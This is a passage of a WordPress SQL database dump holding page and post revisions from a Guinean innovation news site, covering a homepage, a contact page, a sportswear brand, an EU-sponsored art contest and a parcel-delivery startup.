','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-30 13:48:11','2017-10-30 13:48:11','',360,'https://guineeinnove.nimbasolution.com/2017/10/30/360-revision-v1/',0,'revision','',0),(764,1,'2017-10-30 13:51:38','2017-10-30 13:51:38','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-30 13:51:38','2017-10-30 13:51:38','',360,'https://guineeinnove.nimbasolution.com/2017/10/30/360-revision-v1/',0,'revision','',0),(765,1,'2017-10-30 13:52:55','2017-10-30 13:52:55','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-30 13:52:55','2017-10-30 13:52:55','',360,'https://guineeinnove.nimbasolution.com/2017/10/30/360-revision-v1/',0,'revision','',0),(766,1,'2017-10-30 13:54:11','2017-10-30 13:54:11','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-30 13:54:11','2017-10-30 13:54:11','',360,'https://guineeinnove.nimbasolution.com/2017/10/30/360-revision-v1/',0,'revision','',0),(767,1,'2017-10-30 13:58:24','2017-10-30 13:58:24','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-30 13:58:24','2017-10-30 13:58:24','',360,'https://guineeinnove.nimbasolution.com/2017/10/30/360-revision-v1/',0,'revision','',0),(768,1,'2017-10-30 13:59:14','2017-10-30 13:59:14','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-30 13:59:14','2017-10-30 13:59:14','',360,'https://guineeinnove.nimbasolution.com/2017/10/30/360-revision-v1/',0,'revision','',0),(769,1,'2017-10-30 14:00:14','2017-10-30 14:00:14','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-30 14:00:14','2017-10-30 14:00:14','',360,'https://guineeinnove.nimbasolution.com/2017/10/30/360-revision-v1/',0,'revision','',0),(770,1,'2017-10-30 14:00:46','2017-10-30 14:00:46','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-30 14:00:46','2017-10-30 14:00:46','',360,'https://guineeinnove.nimbasolution.com/2017/10/30/360-revision-v1/',0,'revision','',0),(771,1,'2017-10-30 15:54:08','2017-10-30 15:54:08','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-30 15:54:08','2017-10-30 15:54:08','',360,'https://guineeinnove.nimbasolution.com/2017/10/30/360-revision-v1/',0,'revision','',0),(772,1,'2017-10-30 15:54:27','2017-10-30 15:54:27','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-30 15:54:27','2017-10-30 15:54:27','',360,'https://guineeinnove.nimbasolution.com/2017/10/30/360-revision-v1/',0,'revision','',0),(773,1,'2017-10-30 15:54:47','2017-10-30 15:54:47','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-30 15:54:47','2017-10-30 15:54:47','',360,'https://guineeinnove.nimbasolution.com/2017/10/30/360-revision-v1/',0,'revision','',0),(775,1,'2017-10-31 14:15:45','2017-10-31 14:15:45','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-31 14:15:45','2017-10-31 14:15:45','',360,'https://guineeinnove.nimbasolution.com/2017/10/31/360-revision-v1/',0,'revision','',0),(776,1,'2017-10-31 14:16:09','2017-10-31 14:16:09','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-31 14:16:09','2017-10-31 14:16:09','',360,'https://guineeinnove.nimbasolution.com/2017/10/31/360-revision-v1/',0,'revision','',0),(777,1,'2017-10-31 14:16:39','2017-10-31 14:16:39','\n			<h3>Récent</h3>		\n			<h3>Videos </h3>		\n		https://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&#038;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o		\n			<h3>Technologie</h3>		\n			<h3>Agriculture</h3>		\n			<h3>Autres</h3>		\n		','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-31 14:16:39','2017-10-31 14:16:39','',360,'https://guineeinnove.nimbasolution.com/2017/10/31/360-revision-v1/',0,'revision','',0),(778,1,'2017-10-31 14:58:16','2017-10-31 14:58:16','<p>Guinée Sport est gérée par une dame qui entend faire de la marque Nimba une fierté nationale. La nouvelle ligne de maillot a été présentée aux Guinéens à la bluezone de Conakry.</p><p>Après deux ans, Guinée Sport a enfin réussi à présenter sa marque de vêtements de sport. Cette jeune entreprise offre quinze emplois fixes. La nouvelle marque Nimba a été présentée aux Guinéens à travers un défilé et une exposition vente de maillots à Conakry.</p><p>Guinée Sport propose des maillots pour toutes les disciplines sportives et souhaite se faire accompagner par les autorités sportives guinéennes.</p><p>Avec ses sept machines à coudre, Guinée Sport a signé avec trois clubs de football de première division, l’équipe nationale de handball et plusieurs équipes scolaires et universitaires de Guinée.</p>','Une marque de vêtements de sport en Guinée','','inherit','closed','closed','','603-revision-v1','','','2017-10-31 14:58:16','2017-10-31 14:58:16','',603,'https://guineeinnove.nimbasolution.com/2017/10/31/603-revision-v1/',0,'revision','',0),(779,1,'2017-10-31 15:44:40','2017-10-31 15:44:40','&nbsp;\r\n<h3>Récent</h3>\r\n<h3>Videos</h3>\r\nhttps://www.youtube.com/watch?v=0jeXbexRihshttps://www.youtube.com/watch?v=c_ixEg9Gszk&amp;feature=youtu.behttps://www.youtube.com/watch?v=wQaejvxoQ2o\r\n<h3>Technologie</h3>\r\n<h3>Agriculture</h3>\r\n<h3>Autres</h3>','Accueil','','inherit','closed','closed','','360-revision-v1','','','2017-10-31 15:44:40','2017-10-31 15:44:40','',360,'https://guineeinnove.nimbasolution.com/2017/10/31/360-revision-v1/',0,'revision','',0),(780,1,'2017-10-31 15:55:42','2017-10-31 15:55:42','\n			<iframe frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\" src=\"https://maps.google.com/maps?q=kaloum%2C+Conakry&amp;t=m&amp;z=10&amp;output=embed&amp;iwloc=near\"></iframe>		\n			<p style=\"font-size: 16px; color: #999999;\">In case you some questions popped in your mind, Feel free to call, email or even visit us. Also you can write us about whatever you want down below. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut suscipit odio ante, id dapibus elit condimentum vitae. Maecenas eget orci vitae enim accumsan mollis. In congue nunc velit, sit amet eleifend velit cursus vitae.</p>\n<p style=\"font-size: 16px; color: #999999;\"><strong>Telephone :</strong> +0028 55 67 67</p>\n<p style=\"font-size: 16px; color: #999999;\"><strong>Email :</strong> jennier_aster@yourdomain.com</p>\n<p style=\"font-size: 16px; color: #999999;\"><strong>Address :</strong> 590 Tahoe Keys Blvd Lake Tahoe, CA 96150 - United States</p>		\n		','Nous Contacter','','inherit','closed','closed','','363-revision-v1','','','2017-10-31 15:55:42','2017-10-31 15:55:42','',363,'https://guineeinnove.nimbasolution.com/2017/10/31/363-revision-v1/',0,'revision','',0),(781,1,'2017-10-31 15:58:18','2017-10-31 15:58:18','\n			<iframe frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\" src=\"https://maps.google.com/maps?q=kaloum%2C+Conakry&amp;t=m&amp;z=10&amp;output=embed&amp;iwloc=near\"></iframe>		\n			<p style=\"font-size: 16p\n<p style=\"font-size: 16px; color: #999999;\"><strong>Telephone :</strong> +224 625 27 22 90</p>\n<p style=\"font-size: 16px; color: #999999;\"><strong>Email :</strong> fmbangoura7@gmail.com</p>\n<p style=\"font-size: 16px; color: #999999;\"><strong>Addresse :</strong> Kouléwondy Kaloum</p>		\n		','Nous Contacter','','inherit','closed','closed','','363-revision-v1','','','2017-10-31 15:58:18','2017-10-31 15:58:18','',363,'https://guineeinnove.nimbasolution.com/2017/10/31/363-revision-v1/',0,'revision','',0),(784,1,'2017-11-01 01:09:24','2017-11-01 01:09:24','<p>[custom-facebook-feed]</p>','Agriculture','','inherit','closed','closed','','378-revision-v1','','','2017-11-01 01:09:24','2017-11-01 01:09:24','',378,'https://guineeinnove.nimbasolution.com/2017/11/01/378-revision-v1/',0,'revision','',0),(785,1,'2017-11-01 01:09:24','2017-11-01 01:09:24','<p>[custom-facebook-feed]</p>','Agriculture','','inherit','closed','closed','','378-revision-v1','','','2017-11-01 01:09:24','2017-11-01 01:09:24','',378,'https://guineeinnove.nimbasolution.com/2017/11/01/378-revision-v1/',0,'revision','',0),(786,1,'2017-11-01 01:11:10','2017-11-01 01:11:10','<p>[custom-facebook-feed]</p>','Agriculture','','inherit','closed','closed','','378-revision-v1','','','2017-11-01 01:11:10','2017-11-01 01:11:10','',378,'https://guineeinnove.nimbasolution.com/2017/11/01/378-revision-v1/',0,'revision','',0),(787,1,'2017-11-01 01:11:11','2017-11-01 01:11:11','<p>[custom-facebook-feed]</p>','Agriculture','','inherit','closed','closed','','378-revision-v1','','','2017-11-01 01:11:11','2017-11-01 01:11:11','',378,'https://guineeinnove.nimbasolution.com/2017/11/01/378-revision-v1/',0,'revision','',0),(788,1,'2017-11-01 01:11:49','2017-11-01 01:11:49','<p>[custom-facebook-feed]</p>','Agriculture','','inherit','closed','closed','','378-revision-v1','','','2017-11-01 01:11:49','2017-11-01 01:11:49','',378,'https://guineeinnove.nimbasolution.com/2017/11/01/378-revision-v1/',0,'revision','',0),(789,1,'2017-11-01 10:52:47','2017-11-01 10:52:47','<p>Ce Concours de dessin/ peinture a été organisé du 15 février au 15 mars 2017 par la Délégation. Il portait sur le thème:<strong> \"Culture et développement: quelle vision pour la Guinée de demain\"</strong> avec pour objectif de faire émerger et promouvoir des talents artistiques guinéens en montrant que la création artistique est un vecteur de développement.</p><p>Épilogue du concours national de dessin et de peinture organisé par la Délégation de l\'Union européenne en Guinée. Ovations et sourires de satisfaction ont ponctué la cérémonie de remise des Prix organisée dans la salle des spectacles du Centre Culturel Franco-Guinéen en présence de la majorité des participants.</p><p>La cérémonie était présidée par l\'Ambassadeur, Chef de la Délégation de l\'Union européenne, M. Gerardus Gielen, en présence de trois de ses homologues des Etats membres en Guinée: M. Francisco Benitez Salas, Ambassadeur d\'Espagne, M. Jean-Marc Grosgurin, Ambassadeur de France et Mme Catherine Inglehearn, Ambassadeur du Royaume-Uni.</p><p>C\'est le président du Jury, M. Ben Youssouf \"Oscar\" Barry qui a procédé à la proclamation des résultats après avoir rappelé les critères d\'évaluation définis et appliqués par les cinq membres du Jury, à savoir: <em>conformité au thème, originalité de l\'idée, créativité, compétence technique, sensibilité artistique</em>.</p><p>Les trois lauréats, sur 61 participants, sont les suivants:</p><ul><li>PREMIER PRIX: M. DIALLO Alpha Oumar: 38 ans, artiste, dessinateur, sérigraphe, infographe. Outre un lot de gadgets offerts par la Délégation de l\'Union européenne, ce Prix remporte une tablette Apple iPAD Air, 16 Go, dotée d\'une application de dessin professionnel.</li></ul><ul><li>Son œuvre est un dessin qui envisage le développement de la Guinée par la prise en compte de l\'aspect culturel, la protection de l\'environnement et la réparation du tissu social.</li></ul><ul><li>DEUXIÈME PRIX: BOLIVOGUI Amadou Ivan : 30 ans, infographe, musicien, peintre. Ce Prix est constitué d\'une tablette graphique <em>Intuos</em> tactile à stylet pour dessins et créations professionnelles.</li></ul><ul><li>Son œuvre dessinée représente une jeune femme épanouie, cheveux dans le vent, se promenant dans une cité guinéenne moderne et ouverte au monde.</li></ul><ul><li>TROISIÈME PRIX: BANGOURA Louis Isidore Katembè: 31 ans, réalisateur de formation, artiste polyvalent (musique, danse, théâtre, peinture, dessin, bricolage…). Il gagne une mallette multifonctions pour dessinateurs/ graphistes et ou artistes. Comme les deux premiers, ce Prix est accompagné d\'un lot de gadgets estampillés \"Union européenne\".</li></ul><ul><li>L\'œuvre de M. Bangoura est une vision de la Guinée développée à partir des ressources agricoles, énergétiques, le transport, l\'éducation et la préservation de l\'héritage culturel traditionnel.</li></ul><p>Dans le groupe des 10 premiers, les sept autres participants ont été distingués à travers des prix d\'encouragement; et tous les participants ont été gratifiés de <em>goodies</em> offerts par la Délégation.</p><p>Les trophées et les Prix ont été remis par les Ambassadeurs.</p><p>Le Chef de la Délégation de l\'Union européenne, M. Gielen, a salué et remercié les concurrents, ses homologues pour leur présence ainsi que tous ceux qui ont permis la réussite de l\'évènement et notamment le personnel du CCFG à travers son Directeur, M. Nicolas Doyard, qui a tenu à exprimer sa satisfaction d\'avoir pris part à l\'organisation du concours. Sans oublier l\'Institut Supérieur d\'Arts de Dubréka dont les étudiants ont massivement pris part au concours, ainsi que HAVAS Guinée partenaire de la Délégation pour diverses activités.</p><p>De leur côté, les trois lauréats ont pris la parole pour exprimer tour à tour leur satisfaction et leur fierté de remporter ces prix.</p><p><em>\"Tout est possible\" </em>a souligné, Alpha Oumar Diallo (Premier Prix). <em>\"Malgré mon handicap (</em>Il boîte d\'une jambe, NDLR<em>), je suis à mon troisième Prix après avoir remporté deux autres dont celui du logo du 50<sup>ème</sup> anniversaire d\'Indépendance de la Guinée\".</em> M. Diallo invite les artistes à compter sur leurs propres talents au lieu d\'attendre tout de l\'Etat providence.</p><p>La cérémonie a pris fin par la photo de famille, suivie de la visite de l\'exposition de toutes les œuvres du concours présentes au Centre Culturel et accessibles au public librement et gratuitement jusqu\'au 20 mai prochain.</p><p>A rappeler que ce Concours de dessin/ peinture a été organisé du 15 février au 15 mars 2017 par la Délégation. Il portait sur le thème: <strong><em>\"Culture et développement: quelle vision pour la Guinée de demain\"</em></strong> avec pour objectif de faire émerger et promouvoir des talents artistiques guinéens en montrant que la création artistique est un vecteur de développement.</p><p>La cérémonie de remise des Prix et l\'exposition font partie d\'une série d\'activités culturelles (cinéma, quiz radio, etc.) célébrant la Semaine de l\'Europe 2017 organisée par la Délégation et les Etats membres.</p>','Alpha Oumar Diallo gagne le concours national de dessin et de peinture.','','inherit','closed','closed','','681-revision-v1','','','2017-11-01 10:52:47','2017-11-01 10:52:47','',681,'https://guineeinnove.nimbasolution.com/2017/11/01/681-revision-v1/',0,'revision','',0),(790,1,'2017-11-01 10:55:32','2017-11-01 10:55:32','<p>Ce Concours de dessin/ peinture a été organisé du 15 février au 15 mars 2017 par la Délégation. Il portait sur le thème:<strong> \"Culture et développement: quelle vision pour la Guinée de demain\"</strong> avec pour objectif de faire émerger et promouvoir des talents artistiques guinéens en montrant que la création artistique est un vecteur de développement.</p><p>Épilogue du concours national de dessin et de peinture organisé par la Délégation de l\'Union européenne en Guinée. Ovations et sourires de satisfaction ont ponctué la cérémonie de remise des Prix organisée dans la salle des spectacles du Centre Culturel Franco-Guinéen en présence de la majorité des participants.</p><p>La cérémonie était présidée par l\'Ambassadeur, Chef de la Délégation de l\'Union européenne, M. Gerardus Gielen, en présence de trois de ses homologues des Etats membres en Guinée: M. Francisco Benitez Salas, Ambassadeur d\'Espagne, M. Jean-Marc Grosgurin, Ambassadeur de France et Mme Catherine Inglehearn, Ambassadeur du Royaume-Uni.</p><p>C\'est le président du Jury, M. Ben Youssouf \"Oscar\" Barry qui a procédé à la proclamation des résultats après avoir rappelé les critères d\'évaluation définis et appliqués par les cinq membres du Jury, à savoir: <em>conformité au thème, originalité de l\'idée, créativité, compétence technique, sensibilité artistique</em>.</p><p>Les trois lauréats, sur 61 participants, sont les suivants:</p><ul><li>PREMIER PRIX: M. DIALLO Alpha Oumar: 38 ans, artiste, dessinateur, sérigraphe, infographe. Outre un lot de gadgets offerts par la Délégation de l\'Union européenne, ce Prix remporte une tablette Apple iPAD Air, 16 Go, dotée d\'une application de dessin professionnel.</li></ul><ul><li>Son œuvre est un dessin qui envisage le développement de la Guinée par la prise en compte de l\'aspect culturel, la protection de l\'environnement et la réparation du tissu social.</li></ul><ul><li>DEUXIÈME PRIX: BOLIVOGUI Amadou Ivan : 30 ans, infographe, musicien, peintre. Ce Prix est constitué d\'une tablette graphique <em>Intuos</em> tactile à stylet pour dessins et créations professionnelles.</li></ul><ul><li>Son œuvre dessinée représente une jeune femme épanouie, cheveux dans le vent, se promenant dans une cité guinéenne moderne et ouverte au monde.</li></ul><ul><li>TROISIÈME PRIX: BANGOURA Louis Isidore Katembè: 31 ans, réalisateur de formation, artiste polyvalent (musique, danse, théâtre, peinture, dessin, bricolage…). Il gagne une mallette multifonctions pour dessinateurs/ graphistes et ou artistes. Comme les deux premiers, ce Prix est accompagné d\'un lot de gadgets estampillés \"Union européenne\".</li></ul><ul><li>L\'œuvre de M. Bangoura est une vision de la Guinée développée à partir des ressources agricoles, énergétiques, le transport, l\'éducation et la préservation de l\'héritage culturel traditionnel.</li></ul><p>Dans le groupe des 10 premiers, les sept autres participants ont été distingués à travers des prix d\'encouragement; et tous les participants ont été gratifiés de <em>goodies</em> offerts par la Délégation.</p><p>Les trophées et les Prix ont été remis par les Ambassadeurs.</p><p>Le Chef de la Délégation de l\'Union européenne, M. Gielen, a salué et remercié les concurrents, ses homologues pour leur présence ainsi que tous ceux qui ont permis la réussite de l\'évènement et notamment le personnel du CCFG à travers son Directeur, M. Nicolas Doyard, qui a tenu à exprimer sa satisfaction d\'avoir pris part à l\'organisation du concours. Sans oublier l\'Institut Supérieur d\'Arts de Dubréka dont les étudiants ont massivement pris part au concours, ainsi que HAVAS Guinée partenaire de la Délégation pour diverses activités.</p><p>De leur côté, les trois lauréats ont pris la parole pour exprimer tour à tour leur satisfaction et leur fierté de remporter ces prix.</p><p><em>\"Tout est possible\" </em>a souligné, Alpha Oumar Diallo (Premier Prix). <em>\"Malgré mon handicap (</em>Il boîte d\'une jambe, NDLR<em>), je suis à mon troisième Prix après avoir remporté deux autres dont celui du logo du 50<sup>ème</sup> anniversaire d\'Indépendance de la Guinée\".</em> M. Diallo invite les artistes à compter sur leurs propres talents au lieu d\'attendre tout de l\'Etat providence.</p><p>La cérémonie a pris fin par la photo de famille, suivie de la visite de l\'exposition de toutes les œuvres du concours présentes au Centre Culturel et accessibles au public librement et gratuitement jusqu\'au 20 mai prochain.</p><p>A rappeler que ce Concours de dessin/ peinture a été organisé du 15 février au 15 mars 2017 par la Délégation. Il portait sur le thème: <strong><em>\"Culture et développement: quelle vision pour la Guinée de demain\"</em></strong> avec pour objectif de faire émerger et promouvoir des talents artistiques guinéens en montrant que la création artistique est un vecteur de développement.</p><p>La cérémonie de remise des Prix et l\'exposition font partie d\'une série d\'activités culturelles (cinéma, quiz radio, etc.) célébrant la Semaine de l\'Europe 2017 organisée par la Délégation et les Etats membres.</p>','Alpha Oumar Diallo gagne le concours national de dessin et de peinture.','','inherit','closed','closed','','681-revision-v1','','','2017-11-01 10:55:32','2017-11-01 10:55:32','',681,'https://guineeinnove.nimbasolution.com/2017/11/01/681-revision-v1/',0,'revision','',0),(791,1,'2017-11-01 11:07:31','2017-11-01 11:07:31','<p>Ce Concours de dessin/ peinture a été organisé du 15 février au 15 mars 2017 par la Délégation. Il portait sur le thème:<strong> \"Culture et développement: quelle vision pour la Guinée de demain\"</strong> avec pour objectif de faire émerger et promouvoir des talents artistiques guinéens en montrant que la création artistique est un vecteur de développement.</p><p>Épilogue du concours national de dessin et de peinture organisé par la Délégation de l\'Union européenne en Guinée. Ovations et sourires de satisfaction ont ponctué la cérémonie de remise des Prix organisée dans la salle des spectacles du Centre Culturel Franco-Guinéen en présence de la majorité des participants.</p><p>La cérémonie était présidée par l\'Ambassadeur, Chef de la Délégation de l\'Union européenne, M. Gerardus Gielen, en présence de trois de ses homologues des Etats membres en Guinée: M. Francisco Benitez Salas, Ambassadeur d\'Espagne, M. Jean-Marc Grosgurin, Ambassadeur de France et Mme Catherine Inglehearn, Ambassadeur du Royaume-Uni.</p><p>C\'est le président du Jury, M. Ben Youssouf \"Oscar\" Barry qui a procédé à la proclamation des résultats après avoir rappelé les critères d\'évaluation définis et appliqués par les cinq membres du Jury, à savoir: <em>conformité au thème, originalité de l\'idée, créativité, compétence technique, sensibilité artistique</em>.</p><p>Les trois lauréats, sur 61 participants, sont les suivants:</p><ul><li>PREMIER PRIX: M. DIALLO Alpha Oumar: 38 ans, artiste, dessinateur, sérigraphe, infographe. Outre un lot de gadgets offerts par la Délégation de l\'Union européenne, ce Prix remporte une tablette Apple iPAD Air, 16 Go, dotée d\'une application de dessin professionnel. Son œuvre est un dessin qui envisage le développement de la Guinée par la prise en compte de l\'aspect culturel, la protection de l\'environnement et la réparation du tissu social.</li></ul><ul><li>DEUXIÈME PRIX: BOLIVOGUI Amadou Ivan : 30 ans, infographe, musicien, peintre. Ce Prix est constitué d\'une tablette graphique <em>Intuos</em> tactile à stylet pour dessins et créations professionnelles. Son œuvre dessinée représente une jeune femme épanouie, cheveux dans le vent, se promenant dans une cité guinéenne moderne et ouverte au monde.</li></ul><ul><li>TROISIÈME PRIX: BANGOURA Louis Isidore Katembè: 31 ans, réalisateur de formation, artiste polyvalent (musique, danse, théâtre, peinture, dessin, bricolage…). Il gagne une mallette multifonctions pour dessinateurs/ graphistes et ou artistes. Comme les deux premiers, ce Prix est accompagné d\'un lot de gadgets estampillés \"Union européenne\". L\'œuvre de M. Bangoura est une vision de la Guinée développée à partir des ressources agricoles, énergétiques, le transport, l\'éducation et la préservation de l\'héritage culturel traditionnel.</li></ul><p>Dans le groupe des 10 premiers, les sept autres participants ont été distingués à travers des prix d\'encouragement.</p>','Alpha Oumar Diallo gagne le concours national de dessin et de peinture.','','inherit','closed','closed','','681-revision-v1','','','2017-11-01 11:07:31','2017-11-01 11:07:31','',681,'https://guineeinnove.nimbasolution.com/2017/11/01/681-revision-v1/',0,'revision','',0),(792,1,'2017-11-01 11:13:21','2017-11-01 11:13:21','Ce Concours de dessin/ peinture a été organisé du 15 février au 15 mars 2017 par la Délégation. Il portait sur le thème:<strong> \"Culture et développement: quelle vision pour la Guinée de demain\"</strong> avec pour objectif de faire émerger et promouvoir des talents artistiques guinéens en montrant que la création artistique est un vecteur de développement.\r\n\r\nÉpilogue du concours national de dessin et de peinture organisé par la Délégation de l\'Union européenne en Guinée. Ovations et sourires de satisfaction ont ponctué la cérémonie de remise des Prix organisée dans la salle des spectacles du Centre Culturel Franco-Guinéen en présence de la majorité des participants.\r\n\r\nLa cérémonie était présidée par l\'Ambassadeur, Chef de la Délégation de l\'Union européenne, M. Gerardus Gielen, en présence de trois de ses homologues des Etats membres en Guinée: M. Francisco Benitez Salas, Ambassadeur d\'Espagne, M. Jean-Marc Grosgurin, Ambassadeur de France et Mme Catherine Inglehearn, Ambassadeur du Royaume-Uni.\r\n\r\nC\'est le président du Jury, M. Ben Youssouf \"Oscar\" Barry qui a procédé à la proclamation des résultats après avoir rappelé les critères d\'évaluation définis et appliqués par les cinq membres du Jury, à savoir: <em>conformité au thème, originalité de l\'idée, créativité, compétence technique, sensibilité artistique</em>.\r\n\r\nLes trois lauréats, sur 61 participants, sont les suivants:\r\n<ul>\r\n 	<li>PREMIER PRIX: M. DIALLO Alpha Oumar: 38 ans, artiste, dessinateur, sérigraphe, infographe. Outre un lot de gadgets offerts par la Délégation de l\'Union européenne, ce Prix remporte une tablette Apple iPAD Air, 16 Go, dotée d\'une application de dessin professionnel. Son œuvre est un dessin qui envisage le développement de la Guinée par la prise en compte de l\'aspect culturel, la protection de l\'environnement et la réparation du tissu social.</li>\r\n</ul>\r\n<ul>\r\n 	<li>DEUXIÈME PRIX: BOLIVOGUI Amadou Ivan : 30 ans, infographe, musicien, peintre. Ce Prix est constitué d\'une tablette graphique <em>Intuos</em> tactile à stylet pour dessins et créations professionnelles. Son œuvre dessinée représente une jeune femme épanouie, cheveux dans le vent, se promenant dans une cité guinéenne moderne et ouverte au monde.</li>\r\n</ul>\r\n<ul>\r\n 	<li>TROISIÈME PRIX: BANGOURA Louis Isidore Katembè: 31 ans, réalisateur de formation, artiste polyvalent (musique, danse, théâtre, peinture, dessin, bricolage…). Il gagne une mallette multifonctions pour dessinateurs/ graphistes et ou artistes. Comme les deux premiers, ce Prix est accompagné d\'un lot de gadgets estampillés \"Union européenne\". L\'œuvre de M. Bangoura est une vision de la Guinée développée à partir des ressources agricoles, énergétiques, le transport, l\'éducation et la préservation de l\'héritage culturel traditionnel.</li>\r\n</ul>\r\nDans le groupe des 10 premiers, les sept autres participants ont été distingués à travers des prix d\'encouragement.','Alpha Oumar Diallo gagne le concours national de dessin et de peinture.','','inherit','closed','closed','','681-revision-v1','','','2017-11-01 11:13:21','2017-11-01 11:13:21','',681,'https://guineeinnove.nimbasolution.com/2017/11/01/681-revision-v1/',0,'revision','',0),(814,1,'2017-11-01 12:03:29','2017-11-01 12:03:29','Après 7 éditions du \"Prix Orange de l\'Entrepreneur Social\", un projet Guinéen a été sélectionné pour la 1ère fois parmi les 10 finalistes internationaux. Il s\'agit du projet <a href=\"http://entrepreneurclub.orange.com/fr/entrepreneur-social-2017/projet/colismart.html\">Colis\'Mart</a> de SEKOU LAMINE COYAH BANGOURA.\r\n\r\nCOLI’SMART COMPAGNIE offre une technologie orange colis qui permet de transférer les colis à distance partout en guinée presqu’a la même vitesse que le transfert d’argent: un colis acheté à distance via orange money, est déposé dans un point de colis (soit kiosque orange money, boutiques orange, pharmacies, station essences etc..) pour être expédié à temps réel par le biais des partenaires de transport (motos, voiture, camion etc…) qui récupèrent les colis d’un point de colis à un autre en fonction de leurs itinéraires. Pour utiliser le service ORANGE COLIS, l’abonné orange se rend dans un point de colis muni de son colis, fait le dépôt et souscrit moyennant un paiement par USSD (tarif fixé en fonction de l’emplacement du destinateur et de la quantité à livrer). Un message de notification est automatique envoyé au destinateur comportant le numéro de l’expéditeur, le nom du colis, l’adresse du point de réception, et le délai de disponibilité du colis. Les points de colis, les transporteurs et La société orange sont des partenaires qui bénéficient chacun d’un frais de commission à chaque livraison de colis, Colis’mart obtient le reste du montant de transfère de colis. Le transfert de colis via orange money va être une innovation dans le domaine du numérique Guinéen, il va contribuer à la réduction du taux de chômage et de la pauvreté par la création de nouveaux emplois pour la population guinéenne (plus de 800 